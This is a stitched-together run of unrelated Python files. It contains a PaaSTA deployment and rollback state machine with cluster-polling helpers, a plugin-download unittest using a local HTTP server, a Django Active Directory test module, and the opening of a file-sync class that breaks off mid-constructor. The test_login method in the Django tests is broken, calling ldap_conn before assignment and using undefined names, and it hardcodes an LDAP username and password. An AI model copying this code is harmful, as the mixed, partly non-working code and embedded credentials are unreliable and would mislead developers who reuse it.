self.auto_rollbacks_ever_enabled = True
self.update_slack_status(
f"Automatic rollback enabled for this deploy. Will watch for failures and rollback when necessary. To set this permanently, edit `deploy.yaml` and set `auto_rollback: false` for the `{self.deploy_group}` step."
)
def auto_rollbacks_enabled(self) -> bool:
"""This getter exists so it can be a condition on transitions, since those need to be callables."""
return self.auto_rollback
def get_auto_rollback_delay(self) -> float:
return self.auto_rollback_delay
def get_auto_certify_delay(self) -> float:
if self.auto_certify_delay is not None:
return self.auto_certify_delay
else:
if self.auto_rollbacks_ever_enabled:
return DEFAULT_AUTO_CERTIFY_DELAY
else:
return 0
def already_rolling_back(self) -> bool:
return self.state in self.rollback_states
def status_code_by_state(self) -> Mapping[str, int]:
codes = {
"deploy_errored": 2,
"deploy_cancelled": 1,
"mfd_failed": self.mark_for_deployment_return_code,
"abandon": 1,
"complete": 0,
}
if not self.block:
# If we don't pass --wait-for-deployment, then exit immediately after mark-for-deployment succeeds.
codes["deploying"] = 0
if self.get_auto_certify_delay() <= 0:
# Instead of setting a 0-second timer to move to certify, just exit 0 when the deploy finishes.
codes["deployed"] = 0
return codes
def get_active_button(self) -> Optional[str]:
return {
"start_deploy": "forward",
"deploying": "forward",
"deployed": None,
"start_rollback": "rollback",
"rolling_back": "rollback",
"rolled_back": None,
}.get(self.state)
def on_enter_mfd_failed(self):
self.update_slack_status(
f"Marking `{self.commit[:8]}` for deployment for {self.deploy_group} failed. Please see Jenkins for more output."
) # noqa E501
def on_enter_deploying(self):
# if self.block is False, then deploying is a terminal state so we will promptly exit.
# Don't bother starting the background thread in this case.
if self.block:
thread = Thread(
target=self.do_wait_for_deployment, args=(self.commit,), daemon=True
)
thread.start()
self.cancel_paasta_status_reminder()
self.schedule_paasta_status_reminder()
def on_exit_deploying(self):
self.wait_for_deployment_green_lights[self.commit].clear()
self.cancel_paasta_status_reminder()
def on_enter_start_rollback(self):
self.update_slack_status(
f"Rolling back ({self.deploy_group}) to {self.old_git_sha}"
)
self.mark_for_deployment_return_code = mark_for_deployment(
git_url=self.git_url,
deploy_group=self.deploy_group,
service=self.service,
commit=self.old_git_sha,
)
if self.mark_for_deployment_return_code != 0:
self.trigger("mfd_failed")
else:
self.update_slack_thread(
f"Marked `{self.old_git_sha[:8]}` for {self.deploy_group}."
+ (
"\n" + self.get_authors()
if self.deploy_group_is_set_to_notify("notify_after_mark")
else ""
)
)
self.trigger("mfd_succeeded")
def on_enter_rolling_back(self):
if self.block:
thread = Thread(
target=self.do_wait_for_deployment,
args=(self.old_git_sha,),
daemon=True,
)
thread.start()
def on_exit_rolling_back(self):
self.wait_for_deployment_green_lights[self.old_git_sha].clear()
def on_enter_deploy_errored(self):
report_waiting_aborted(self.service, self.deploy_group)
self.update_slack_status(f"Deploy aborted, but it will still try to converge.")
self.send_manual_rollback_instructions()
if self.deploy_group_is_set_to_notify("notify_after_abort"):
self.ping_authors("Deploy errored")
def on_enter_deploy_cancelled(self):
if self.deploy_group_is_set_to_notify("notify_after_abort"):
self.ping_authors("Deploy cancelled")
def do_wait_for_deployment(self, target_commit: str):
try:
self.wait_for_deployment_green_lights[target_commit].set()
wait_for_deployment(
service=self.service,
deploy_group=self.deploy_group,
git_sha=target_commit,
soa_dir=self.soa_dir,
timeout=self.timeout,
green_light=self.wait_for_deployment_green_lights[target_commit],
progress=self.progress,
)
self.update_slack_thread(
f"Finished waiting for deployment of {target_commit}"
)
self.trigger("deploy_finished")
except (KeyboardInterrupt, TimeoutError):
if self.wait_for_deployment_green_lights[target_commit].is_set():
# When we manually trigger a rollback, we clear the green_light, which causes wait_for_deployment to
# raise KeyboardInterrupt. Don't trigger deploy_cancelled in this case.
self.trigger("deploy_cancelled")
except NoSuchCluster:
self.trigger("deploy_errored")
except Exception:
log.error("Caught exception in wait_for_deployment:")
log.error(traceback.format_exc())
self.trigger("deploy_errored")
def on_enter_rolled_back(self):
self.update_slack_status(
f"Finished rolling back to `{self.old_git_sha[:8]}` in {self.deploy_group}"
)
line = f"Rollback to {self.old_git_sha[:8]} for {self.deploy_group} complete"
_log(service=self.service, component="deploy", line=line, level="event")
self.start_timer(self.auto_abandon_delay, "auto_abandon", "abandon")
def on_enter_deployed(self):
self.update_slack_status(
f"Finished deployment of `{self.commit[:8]}` to {self.deploy_group}"
)
line = f"Deployment of {self.commit[:8]} for {self.deploy_group} complete"
_log(service=self.service, component="deploy", line=line, level="event")
self.send_manual_rollback_instructions()
if not (self.any_slo_failing() and self.auto_rollbacks_enabled()):
if self.get_auto_certify_delay() > 0:
self.start_timer(
self.get_auto_certify_delay(), "auto_certify", "certify"
)
if self.deploy_group_is_set_to_notify("notify_after_good_deploy"):
self.ping_authors()
def on_enter_complete(self):
if self.deploy_group_is_set_to_notify("notify_after_good_deploy"):
self.ping_authors()
def send_manual_rollback_instructions(self):
if self.old_git_sha != self.commit:
message = (
"If you need to roll back manually, run: "
f"`paasta rollback --service {self.service} --deploy-group {self.deploy_group} "
f"--commit {self.old_git_sha}`"
)
self.update_slack_thread(message)
print(message)
def after_state_change(self):
self.update_slack()
super().after_state_change()
def get_signalfx_api_token(self) -> str:
return (
load_system_paasta_config()
.get_monitoring_config()
.get("signalfx_api_key", None)
)
def get_button_text(self, button, is_active) -> str:
active_button_texts = {
"forward": f"Rolling Forward to {self.commit[:8]} :zombocom:"
}
inactive_button_texts = {
"forward": f"Continue Forward to {self.commit[:8]} :arrow_forward:",
"complete": f"Complete deploy to {self.commit[:8]} :white_check_mark:",
"snooze": f"Reset countdown",
"enable_auto_rollbacks": "Enable auto rollbacks :eyes:",
"disable_auto_rollbacks": "Disable auto rollbacks :close_eyes_monkey:",
}
if self.old_git_sha is not None:
active_button_texts.update(
{"rollback": f"Rolling Back to {self.old_git_sha[:8]} :zombocom:"}
)
inactive_button_texts.update(
{
"rollback": f"Roll Back to {self.old_git_sha[:8]} :arrow_backward:",
"abandon": f"Abandon deploy, staying on {self.old_git_sha[:8]} :x:",
}
)
return (active_button_texts if is_active else inactive_button_texts)[button]
def start_auto_rollback_countdown(self, extra_text="") -> None:
cancel_button_text = self.get_button_text(
"disable_auto_rollbacks", is_active=False
)
super().start_auto_rollback_countdown(
extra_text=f'Click "{cancel_button_text}" to cancel this!'
)
if self.deploy_group_is_set_to_notify("notify_after_auto_rollback"):
self.ping_authors()
def deploy_group_is_set_to_notify(self, notify_type):
return deploy_group_is_set_to_notify(
self.deploy_info, self.deploy_group, notify_type
)
def __build_rollback_audit_details(
self, rollback_type: RollbackTypes
) -> Dict[str, str]:
return {
"rolled_back_from": self.commit,
"rolled_back_to": self.old_git_sha,
"rollback_type": rollback_type.value,
"deploy_group": self.deploy_group,
}
def log_slo_rollback(self) -> None:
_log_audit(
action="rollback",
action_details=self.__build_rollback_audit_details(
RollbackTypes.AUTOMATIC_SLO_ROLLBACK
),
service=self.service,
)
def log_user_rollback(self) -> None:
_log_audit(
action="rollback",
action_details=self.__build_rollback_audit_details(
RollbackTypes.USER_INITIATED_ROLLBACK
),
service=self.service,
)
class ClusterData:
"""An auxiliary data transfer class.
Used by _query_clusters(), instances_deployed(),
_run_cluster_worker(), _run_instance_worker().
:param cluster: the name of the cluster.
:param service: the name of the service.
:param git_sha: git sha marked for deployment.
:param instances_queue: a thread-safe queue. Should contain all cluster
instances that need to be checked.
:type instances_queue: Queue
"""
def __init__(self, cluster, service, git_sha, instances_queue):
self.cluster = cluster
self.service = service
self.git_sha = git_sha
self.instances_queue = instances_queue
def __repr__(self):
return (
f"ClusterData(cluster={self.cluster}, service={self.service}, "
f"git_sha={self.git_sha}, instances_queue={self.instances_queue})"
)
def instances_deployed(cluster_data, instances_out, green_light):
"""Create a thread pool to run _run_instance_worker()
:param cluster_data: an instance of ClusterData.
:param instances_out: a empty thread-safe queue. I will contain
instances that are not deployed yet.
:type instances_out: Queue
:param green_light: See the docstring for _query_clusters().
"""
num_threads = min(5, cluster_data.instances_queue.qsize())
workers_launched = []
for _ in range(num_threads):
worker = Thread(
target=_run_instance_worker, args=(cluster_data, instances_out, green_light)
)
worker.start()
workers_launched.append(worker)
for worker in workers_launched:
worker.join()
def _run_instance_worker(cluster_data, instances_out, green_light):
"""Get instances from the instances_in queue and check them one by one.
If an instance isn't deployed, add it to the instances_out queue
to re-check it later.
:param cluster_data: an instance of ClusterData.
:param instances_out: See the docstring for instances_deployed().
:param green_light: See the docstring for _query_clusters().
"""
api = client.get_paasta_api_client(cluster=cluster_data.cluster)
if not api:
log.warning(
"Couldn't reach the PaaSTA api for {}! Assuming it is not "
"deployed there yet.".format(cluster_data.cluster)
)
while not cluster_data.instances_queue.empty():
try:
instance_config = cluster_data.instances_queue.get(block=False)
except Empty:
return
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
while not cluster_data.instances_queue.empty() and green_light.is_set():
try:
instance_config = cluster_data.instances_queue.get(block=False)
except Empty:
return
instance = instance_config.get_instance()
log.debug(
"Inspecting the deployment status of {}.{} on {}".format(
cluster_data.service, instance, cluster_data.cluster
)
)
try:
status = None
status = api.service.status_instance(
service=cluster_data.service,
instance=instance,
include_smartstack=False,
include_envoy=False,
include_mesos=False,
).result()
except HTTPError as e:
if e.response.status_code == 404:
log.warning(
"Can't get status for instance {}, service {} in "
"cluster {}. This is normally because it is a new "
"service that hasn't been deployed by PaaSTA yet".format(
instance, cluster_data.service, cluster_data.cluster
)
)
else:
log.warning(
"Error getting service status from PaaSTA API for {}: {}"
"{}".format(
cluster_data.cluster, e.response.status_code, e.response.text
)
)
except ConnectionError as e:
log.warning(
"Error getting service status from PaaSTA API for {}:"
"{}".format(cluster_data.cluster, e)
)
long_running_status = None
if status:
if status.marathon:
long_running_status = status.marathon
elif status.kubernetes:
long_running_status = status.kubernetes
if not status:
log.debug(
"No status for {}.{}, in {}. Not deployed yet.".format(
cluster_data.service, instance, cluster_data.cluster
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
elif not long_running_status:
log.debug(
"{}.{} in {} is not a Marathon or Kubernetes job. Marked as deployed.".format(
cluster_data.service, instance, cluster_data.cluster
)
)
elif (
long_running_status.expected_instance_count == 0
or long_running_status.desired_state == "stop"
):
log.debug(
"{}.{} in {} is marked as stopped. Marked as deployed.".format(
cluster_data.service, status.instance, cluster_data.cluster
)
)
else:
if long_running_status.app_count != 1:
print(
" {}.{} on {} is still bouncing, {} versions "
"running".format(
cluster_data.service,
status.instance,
cluster_data.cluster,
long_running_status.app_count,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
if not cluster_data.git_sha.startswith(status.git_sha):
print(
" {}.{} on {} doesn't have the right sha yet: {}".format(
cluster_data.service,
instance,
cluster_data.cluster,
status.git_sha,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
if long_running_status.deploy_status not in [
"Running",
"Deploying",
"Waiting",
]:
print(
" {}.{} on {} isn't running yet: {}".format(
cluster_data.service,
instance,
cluster_data.cluster,
long_running_status.deploy_status,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
# The bounce margin factor defines what proportion of instances we need to be "safe",
# so consider it scaled up "enough" if we have that proportion of instances ready.
required_instance_count = int(
math.ceil(
instance_config.get_bounce_margin_factor()
* long_running_status.expected_instance_count
)
)
if required_instance_count > long_running_status.running_instance_count:
print(
" {}.{} on {} isn't scaled up yet, "
"has {} out of {} required instances (out of a total of {})".format(
cluster_data.service,
instance,
cluster_data.cluster,
long_running_status.running_instance_count,
required_instance_count,
long_running_status.expected_instance_count,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
print(
"Complete: {}.{} on {} looks 100% deployed at {} "
"instances on {}".format(
cluster_data.service,
instance,
cluster_data.cluster,
long_running_status.running_instance_count,
status.git_sha,
)
)
cluster_data.instances_queue.task_done()
def _query_clusters(clusters_data, green_light):
"""Run _run_cluster_worker() in a separate thread for each paasta cluster
:param clusters_data: a list of ClusterData instances.
:param green_light: an instance of threading.Event().
It is supposed to be cleared when KeyboardInterrupt is
received. All running threads should check it
periodically and exit when it is cleared.
"""
workers_launched = []
for cluster_data in clusters_data:
if not cluster_data.instances_queue.empty():
worker = Thread(
target=_run_cluster_worker, args=(cluster_data, green_light)
)
worker.start()
workers_launched.append(worker)
for worker in workers_launched:
try:
while green_light.is_set() and worker.isAlive():
time.sleep(0.2)
except (KeyboardInterrupt, SystemExit):
green_light.clear()
print("KeyboardInterrupt received. Terminating..")
worker.join()
def _run_cluster_worker(cluster_data, green_light):
"""Run instances_deployed() for a cluster
:param cluster_data: an instance of ClusterData.
:param green_light: See the docstring for _query_clusters().
"""
instances_out = Queue()
instances_deployed(
cluster_data=cluster_data, instances_out=instances_out, green_light=green_light
)
cluster_data.instances_queue = instances_out
if cluster_data.instances_queue.empty():
print(f"Deploy to {cluster_data.cluster} complete!")
return cluster_data
WAIT_FOR_INSTANCE_CLASSES = [
MarathonServiceConfig,
KubernetesDeploymentConfig,
CassandraClusterDeploymentConfig,
]
def clusters_data_to_wait_for(service, deploy_group, git_sha, soa_dir):
service_configs = PaastaServiceConfigLoader(
service=service, soa_dir=soa_dir, load_deployments=False
)
total_instances = 0
clusters_data = []
api_endpoints = load_system_paasta_config().get_api_endpoints()
for cluster in service_configs.clusters:
if cluster not in api_endpoints:
print(
PaastaColors.red(
"Cluster %s is NOT in paasta-api endpoints config." % cluster
)
)
raise NoSuchCluster
# Currently only marathon, kubernetes and cassandra instances are
# supported for wait_for_deployment because they are the only thing
# that are worth waiting on.
instances_queue = Queue()
for instance_class in WAIT_FOR_INSTANCE_CLASSES:
for instance_config in service_configs.instance_configs(
cluster=cluster, instance_type_class=instance_class
):
if instance_config.get_deploy_group() == deploy_group:
instances_queue.put(instance_config)
total_instances += 1
if not instances_queue.empty():
clusters_data.append(
ClusterData(
cluster=cluster,
service=service,
git_sha=git_sha,
instances_queue=instances_queue,
)
)
return clusters_data, total_instances
def wait_for_deployment(
service, deploy_group, git_sha, soa_dir, timeout, green_light=None, progress=None
):
clusters_data, total_instances = clusters_data_to_wait_for(
service, deploy_group, git_sha, soa_dir
)
if not clusters_data:
_log(
service=service,
component="deploy",
line=(
"Couldn't find any marathon instances for service {} in deploy group {}. Exiting.".format(
service, deploy_group
)
),
level="event",
)
return
print(
"Waiting for deployment of {} for '{}' to complete...".format(
git_sha, deploy_group
)
)
deadline = time.time() + timeout
if green_light is None:
green_light = Event()
green_light.set()
with progressbar.ProgressBar(maxval=total_instances) as bar:
while time.time() < deadline:
_query_clusters(clusters_data, green_light)
if not green_light.is_set():
raise KeyboardInterrupt
finished_instances = total_instances - sum(
(c.instances_queue.qsize() for c in clusters_data)
)
bar.update(finished_instances)
if progress is not None:
progress.percent = bar.percentage
progress.waiting_on = {
c.cluster: list(c.instances_queue.queue) for c in clusters_data
}
if all((cluster.instances_queue.empty() for cluster in clusters_data)):
sys.stdout.flush()
if progress is not None:
progress.percent = 100.0
progress.waiting_on = None
return 0
else:
time.sleep(min(60, timeout))
sys.stdout.flush()
_log(
service=service,
component="deploy",
line=compose_timeout_message(
clusters_data, timeout, deploy_group, service, git_sha
),
level="event",
)
raise TimeoutError
def compose_timeout_message(clusters_data, timeout, deploy_group, service, git_sha):
cluster_instances = {}
for c_d in clusters_data:
while c_d.instances_queue.qsize() > 0:
cluster_instances.setdefault(c_d.cluster, []).append(
c_d.instances_queue.get(block=False).get_instance()
)
c_d.instances_queue.task_done()
paasta_status = []
paasta_logs = []
for cluster, instances in sorted(cluster_instances.items()):
if instances:
joined_instances = ",".join(instances)
paasta_status.append(
"paasta status -c {cluster} -s {service} -i {instances}".format(
cluster=cluster, service=service, instances=joined_instances
)
)
paasta_logs.append(
"paasta logs -c {cluster} -s {service} -i {instances} -C deploy -l 1000".format(
cluster=cluster, service=service, instances=joined_instances
)
)
return (
"\n\nTimed out after {timeout} seconds, waiting for {service} "
"in {deploy_group} to be deployed by PaaSTA.\n"
"This probably means the deploy hasn't succeeded. The new service "
"might not be healthy or one or more clusters could be having issues.\n\n"
"To debug try running:\n\n"
" {status_commands}\n\n {logs_commands}"
"\n\nIf the service is known to be slow to start you may wish to "
"increase the timeout on this step.\n"
"To wait a little longer run:\n\n"
" paasta wait-for-deployment -s {service} -l {deploy_group} -c {git_sha}".format(
timeout=timeout,
deploy_group=deploy_group,
service=service,
git_sha=git_sha,
status_commands="\n ".join(paasta_status),
logs_commands="\n ".join(paasta_logs),
)
)
class NoSuchCluster(Exception):
"""To be raised by wait_for_deployment() when a service has a marathon config for
a cluster that is not listed in /etc/paasta/api_endpoints.json.
"""
pass
|
test_fetchplugin_dialog_model.py
|
"""test_fetchplugin_dialog_model.py - tests the fetchplugin_dialog_model module
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from models import fetchplugin_dialog_model
from models import zipper
from controllers import pathfinder
import cStringIO
import os
import SimpleHTTPServer
import SocketServer
import random
import threading
import unittest
import urllib
class TestFetchPluginDialogModel(unittest.TestCase):
"""Tests the FetchPluginDialogModel class"""
@classmethod
def local_plugin(cls, plugin_name):
"""Returns the local path and filename of the specified plugin archive."""
cur_dir = os.getcwd()
if os.path.normcase(cur_dir) == os.path.normcase(os.path.dirname(__file__)):
# Running this test module directly
return os.path.join('support_files', plugin_name)
else:
# Running as part of larger project test suite
return os.path.join('models', 'tests', 'support_files', plugin_name)
@property
def plugin(self):
"""Returns the path and filename to the known good plugin"""
return TestFetchPluginDialogModel.local_plugin('good_medfilter_plugin.zip')
def setUp(self):
"""Creates a SimpleHTTPServer instance to handle a single
request. Use self.server_thd.start() to initiate."""
self.mock_controller = ""
self.model = fetchplugin_dialog_model.FetchPluginDialogModel(self.mock_controller)
self.plugin_url_params = {'url': self.plugin,
'zip_encrypted': False,
'zip_password': None}
def test_get_plugin(self):
"""Verify the model successfully retrieves the plugin"""
self.model.get_plugin(self.plugin_url_params)
with open(self.plugin, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, self.model.plugin_fetcher.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
self.model.plugin_fetcher.plugin)
def test_get_readme(self):
"""Verify model returns the plugin archive's README"""
readme_fetcher = zipper.UnZipper(self.plugin)
expected_readme = readme_fetcher.read("readme.txt")
retrieved_readme = self.model.get_readme(self.plugin_url_params)
self.assertEqual(expected_readme, retrieved_readme)
def test_install_plugin(self):
"""Verify installation of the plugin"""
sample_plugin_url = TestFetchPluginDialogModel.local_plugin('greets_plugin.zip')
installed_plugin_name = os.path.join(pathfinder.plugins_path(), 'greets_plugin.py')
plugin_url_params = {'url': sample_plugin_url,
'zip_encrypted': True,
'zip_password': '9225'}
self.model.get_plugin(plugin_url_params)
successful_installation = self.model.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(successful_installation)
# Clean up - attempt to remove the sample plugin if it already exists
if os.path.exists(installed_plugin_name):
try:
os.remove(installed_plugin_name)
except WindowsError: # file in use
return
class TestRemoteFetchPluginDialogModel(unittest.TestCase):
"""Tests the FetchRemotePluginDialogModel class"""
@classmethod
def setUpClass(cls):
"""Create a SimpleHTTPServer instance to serve test files from the support_files folder"""
cls.PORT = 8000 + random.randint(1, 1000)
req_handler = SimpleHTTPServer.SimpleHTTPRequestHandler
cls.httpd = SocketServer.TCPServer(("localhost", cls.PORT), req_handler)
cls.httpd.timeout = 5
@classmethod
def local_plugin(cls, plugin_name):
"""Returns the local path and filename of the specified plugin archive."""
cur_dir = os.getcwd()
if os.path.normcase(cur_dir) == os.path.normcase(os.path.dirname(__file__)):
# Running this test module directly
return os.path.join('support_files', plugin_name)
else:
# Running as part of larger project test suite
return os.path.join('models', 'tests', 'support_files', plugin_name)
@classmethod
def local_plugin_url(cls, plugin_name):
"""Returns the plugin converted to an URL"""
return urllib.pathname2url(TestRemoteFetchPluginDialogModel.local_plugin(plugin_name))
@classmethod
def plugin_url_params(cls, plugin_name):
"""Returns the URL to the specified plugin name when served by the test server"""
return 'http://localhost:{0}/{1}'.format(cls.PORT,
TestRemoteFetchPluginDialogModel.local_plugin_url(
plugin_name))
@property
def plugin(self):
"""Returns the path and filename to the known good plugin"""
return TestRemoteFetchPluginDialogModel.local_plugin('good_medfilter_plugin.zip')
@property
def good_plugin_url(self):
"""Returns the URL to the known good plugin"""
return TestRemoteFetchPluginDialogModel.plugin_url_params('good_medfilter_plugin.zip')
def setUp(self):
"""Creates a SimpleHTTPServer instance to handle a single
request. Use self.server_thd.start() to initiate."""
self.server_thd = threading.Thread(
target=TestRemoteFetchPluginDialogModel.httpd.handle_request)
self.mock_controller = ""
self.model = fetchplugin_dialog_model.FetchRemotePluginDialogModel(self.mock_controller)
self.plugin_url_params = {'url': self.good_plugin_url,
'login': False,
'username': None,
'password': None,
'zip_encrypted': False,
'zip_password': None}
def tearDown(self):
"""Shuts down the server process if still active"""
if self.server_thd.is_alive():
self.server_thd.join()
def test_get_plugin(self):
"""Verify the model successfully retrieves the plugin"""
self.server_thd.start()
self.model.get_plugin(self.plugin_url_params)
with open(self.plugin, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, self.model.plugin_fetcher.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
self.model.plugin_fetcher.plugin)
def test_get_readme(self):
"""Verify model returns the plugin archive's README"""
self.server_thd.start()
readme_fetcher = zipper.UnZipper(self.plugin)
expected_readme = readme_fetcher.read("readme.txt")
self.model.get_plugin(self.plugin_url_params)
retrieved_readme = self.model.get_readme(self.plugin_url_params)
self.assertEqual(expected_readme, retrieved_readme)
def test_install_plugin(self):
"""Verify installation of the plugin"""
self.server_thd.start()
sample_plugin_url = TestRemoteFetchPluginDialogModel.plugin_url_params('greets_plugin.zip')
installed_plugin_name = os.path.join(pathfinder.plugins_path(), 'greets_plugin.py')
plugin_url_params = {'url': sample_plugin_url,
'login': False,
'username': None,
'password': None,
'zip_encrypted': True,
'zip_password': '9225'}
self.model.get_plugin(plugin_url_params)
successful_installation = self.model.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(successful_installation)
# Clean up - attempt to remove the sample plugin if it already exists
if os.path.exists(installed_plugin_name):
try:
os.remove(installed_plugin_name)
except WindowsError: # file in use
return
if __name__ == "__main__":
random.seed()
unittest.main()
|
tests.py
|
from time import sleep
from django.conf import settings
from typing import List, Tuple
# import os
# testing libraries
from django.test import TestCase
from unittest_dataprovider import data_provider
# django_adtools
from django_adtools.ad_tools import ad_clear_username
from django_adtools.discover_dc import DCList, re_ip
# emulation of a DNS Server
from dnslib.zoneresolver import ZoneResolver
from dnslib.server import DNSServer
# emulation of a TCP Server
import socket
# threading
from threading import Thread, Lock
# todo
# emulaiton of a LDAP Server
# import logging
# from django_adtools import logger
from .models import *
# from io import StringIO
# from django.core.management import call_command
# the simple DNS zone file for testing getting SRV records from dnslib.DNSServer (the python emulator of DNS Server)
zone_file: str = """
{domain}. 600 IN SOA localhost localhost ( 2007120710 1d 2h 4w 1h )
{domain}. 400 IN NS localhost
{domain}. 600 IN A 127.0.0.1
controller.{domain}. IN A 127.0.0.1
_ldap._tcp.dc._msdcs.{domain}. 600 IN SRV 1 10 {port} {srv_address}."""
domain: str = 'domain.local' # testing name of the domain
class ServerInfo:
"""
Contains information about TCP Server
"""
def __init__(self):
self.port: int = 0 # a number of a TCP port
self.connection_established: bool = False # a client has established connetion to the server (True)
def __str__(self):
return f"ServerInfo(port={self.port}, connection_etablished={self.connection_established}"
def start_tcp_server(server_info: ServerInfo, lock: Lock) -> None:
"""
Starts a TCP server on a random free port, then waits for connection from a client
:param server_info:
:type server_info: ServerInfo
:param lock:
:type lock: Lock
:return: None
"""
lock.acquire() # this lock means that socket is still creating
sock: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 0)) # bind to a random free port
sock.listen(1)
server_info.port = sock.getsockname()[1] # save the number of the server port
lock.release() # the socket is created
_ = sock.accept() # blocks here until a connection from a client
server_info.connection_established = True
sock.close()
class TestDiscoverDC(TestCase):
@staticmethod
def ip_addresses() -> Tuple[
Tuple[str, bool], Tuple[str, bool], Tuple[str, bool], Tuple[str, bool], Tuple[str, bool]
]:
"""
Dataprovider for test_re_ip
"""
return (
('127.0.0.1', True,),
('10.1.2.3', True,),
('256.255.255.0', False,),
('something', False,),
('0.0.0.0', True,),
)
@data_provider(ip_addresses)
def test_re_ip(self, ip_address: str, is_valid_ip: bool):
"""
Tests re_ip regex pattern to match ipv4 addresses only
"""
self.assertEqual(bool(re_ip.search(ip_address)), is_valid_ip)
@staticmethod
def srv_addresses() -> Tuple[Tuple[str], Tuple[str],]:
"""
Dataprovider for test_discover
"""
return (
(f'controller.{domain}',),
('127.0.0.1',),
)
@data_provider(srv_addresses)
def test_discover(self, srv_address: str):
server_info = ServerInfo()
lock: Lock = Lock()
Thread(target=start_tcp_server, args=(server_info, lock)).start()
sleep(0.01) # wait for thread
# waiting for the TCP server emulator thread is coming up
lock.acquire()
lock.release()
name_servers: List[str] = ['127.0.0.1'] # the list of nameservers
# configures the DNS Server
zone_resolver: ZoneResolver = ZoneResolver(
zone=zone_file.format(domain=domain, srv_address=srv_address, port=server_info.port),
)
# port=0 means that the DNS Server will choose a free UDP Port
dns_server: DNSServer = DNSServer(resolver=zone_resolver, port=0, tcp=False)
dns_server.start_thread() # start the DNS Server in a separate python thread
sleep(0.1) # waiting for the DNS Server thread is coming up
port: int = dns_server.server.server_address[1] # gets the number of the UDP Port
# discover for domain controllers
dc_list: DCList = DCList(domain=domain, nameservers=name_servers, port=port)
self.assertIsNotNone(dc_list.get_dc_list(), 'Could not get a list of Domain Controllers')
# try to get an available domain controller
dc: str = dc_list.get_available_dc_ip()
self.assertIsNotNone(dc, "Could not get an available Domain Controller")
# stop DNS Server
dns_server.server.server_close()
dns_server.stop()
class TestSettings(TestCase):
"""
This class contains tests for the settings.py file
"""
def test_installed_apps(self):
"""
Checks that 'django_adtools' are in INSTALLED_APPS
"""
self.assertIn(__package__, settings.INSTALLED_APPS)
class TestDomainControllerModel(TestCase):
def test_domain_controller_model(self):
ip: str = '127.0.0.1'
DomainController.set(ip=ip)
dc: str = DomainController.get()
self.assertIsNotNone(dc)
#
#
# class TestManagementCommands(TestCase):
# def test_discovery(self) -> None:
# """
# Tests 'python manage.py discover' command
# """
# out = StringIO()
# result = call_command('discover', stdout=out)
# self.assertIsNone(result)
# self.assertEqual(out.getvalue(), '')
# dc: str = DomainController.get()
# self.assertIsNotNone(dc)
#
# @override_settings(DEBUG=True)
# def test_logger(self) -> None:
# out: StringIO = StringIO()
# handler: logging.StreamHandler = logging.StreamHandler(stream=out)
# logger.addHandler(hdlr=handler)
# message: str = 'some test log message'
# logger.error(message)
# logger.removeHandler(hdlr=handler)
# self.assertEqual(out.getvalue().rstrip(), message)
#
#
class TestADTools(TestCase):
def test_clear_username(self):
self.assertEqual(ad_clear_username('user@domain.com'), 'user')
self.assertEqual(ad_clear_username('DOMAIN\\user'), 'user')
def test_login(self):
domain_controller_ip: str = '127.0.0.1'
ldap_username: str = f'userspy@shmakovpn.ru'
ldap_password: str = f'a-123456'
ldap_conn = ldap_conn(dc=domain_controller_ip, username=ldap_username, password=ldap_password)
if settings.ADTOOLS_TEST_USERNAME and settings.ADTOOLS_TEST_PASSWORD:
conn = django_adtools.ad_tools.ldap_connect(
dc=dc,
username=settings.ADTOOLS_TEST_USERNAME,
password=settings.ADTOOLS_TEST_PASSWORD
)
self.assertIsNotNone(conn, 'Could not connect to Domain Controller')
dn: str = django_adtools.ad_tools.user_dn(
conn=conn,
username=settings.ADTOOLS_TEST_USERNAME,
domain=settings.ADTOOLS_DOMAIN
)
self.assertIsNotNone(
dn,
f'Could not get a Distinguished Name of user: {settings.ADTOOLS_TEST_USERNAME}'
)
print(f"Distinguished Name of user: {settings.ADTOOLS_TEST_USERNAME} is {dn}")
groups: List[str] = django_adtools.ad_tools.dn_groups(
conn=conn,
dn=dn,
domain=settings.ADTOOLS_DOMAIN
)
self.assertIsNotNone(groups, f"Could not get groups for user {dn}")
self.assertGreater(len(groups), 0, f'An empty groups array got for user {dn}')
print(f"ad_groups: {groups}")
self.assertIn(settings.ADTOOLS_TEST_GROUP, groups)
|
ServerWorkSync3.py
|
'''
Version 3.0 - Now \w Journals and Threading
'''
from watchdog.events import PatternMatchingEventHandler
from colorama import Fore, Style
from lib.rfilecmp import cmp
import stat,csv,time
import pandas as pd
import threading
import paramiko
import os,errno
'''(Hint: Check threading -> Attempt to connect (required data on ssh_client_dict) every X seconds)'''
# TODO #3: Implement a startup script to invoke ServerWorkSync for each workspace @workspaces.ini
'''(Hint: Check the workspace_sync_toy_example.py and generalize its behavior for each workspace'''
# TODO #4: Implement the back-and-forth sync automatically (without executing two separate scripts)
class ServerWorkSync(PatternMatchingEventHandler):
def __init__(self, ssh_client_dict, localpath, remotepath, hostname='', verbose=False, shallow_filecmp=True, autosync=False, sync_interval=30, reconnect_interval=30,\
patterns=None, ignore_patterns=None, ignore_directories=False, case_sensitive=False):
super(ServerWorkSync, self).__init__(patterns, ignore_patterns, ignore_directories, case_sensitive)
self.localpath = localpath
self.remotepath = remotepath
self.hostname = hostname
self.verbose = verbose
self.shallow_filecmp = shallow_filecmp
self.autosync = autosync
self.sync_interval=sync_interval
self.reconnect_interval=reconnect_interval
self.journal_path = os.path.join(os.path.join(os.path.expanduser('~'), '.recon', 'logs', 'journal.csv'))
if not os.path.exists(self.journal_path):
self.__journal(mode='h', data=['timestamp' ,'event' , 'src', 'dest'])
self.root = os.path.split(localpath)[1]
self.ssh_client_dict = ssh_client_dict
try:
